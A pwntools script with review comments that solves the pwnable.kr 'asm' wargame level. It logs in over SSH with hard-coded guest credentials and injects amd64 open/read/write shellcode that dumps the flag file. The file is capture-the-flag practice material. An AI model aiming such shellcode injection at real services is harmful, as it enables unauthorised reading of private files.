# pwntools script for the pwnable.kr "asm" wargame level.
#
# Flow: log in to the wargame host over SSH, connect from there to the service
# on localhost:9026, wait for its "shellcode: " prompt, and send amd64 machine
# code that opens one file, reads it and writes the bytes to fd 1.
#
# NOTE(review): raw_input() and the str-typed payload suggest this was written
# for Python 2; confirm before running under Python 3.
from pwn import *

context(arch='amd64', os='linux')

# Loaded from the working directory but never referenced again below.
elf = ELF('./asm')

# Name of the file the payload opens (path is relative to the service's cwd).
flag_path = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'

# Remote mode. The credentials are hard-coded in the script.
# NOTE(review): presumably this is the wargame's shared guest login; never
# copy this pattern for real accounts.
gateway = ssh(host='pwnable.kr', port=2222, user='asm', password='guest')

# Alternatives the author left disabled:
#   gateway.download_file('asm')          # fetch the binary for local analysis
#   target = gateway.process('./asm')     # run the binary on the SSH host
#   target = process('./asm')             # run the binary locally
target = gateway.connect_remote('localhost', 9026)

# Blocks until Enter is pressed (presumably to give time to attach a debugger).
raw_input('press_any_key')

# Assembly source, in execution order. Only open/read/write are used.
# The write length is a fixed 1024, not the count returned by read, so the
# output may contain stack bytes past the end of the file contents.
stages = [
    shellcraft.amd64.pushstr(flag_path),         # file name onto the stack
    shellcraft.amd64.open('rsp'),                # open(name); fd returned in rax
    shellcraft.amd64.read('rax', 'rsp', 1024),   # read(fd, rsp, 1024)
    shellcraft.amd64.write(1, 'rsp', 1024),      # write(1, rsp, 1024)
]
listing = ''.join(stages)
log.info(listing)  # log the generated assembly text before assembling it

machine_code = asm(listing)

log.info(target.recvuntil("shellcode: "))
target.send(machine_code)
log.success(target.recv(1024))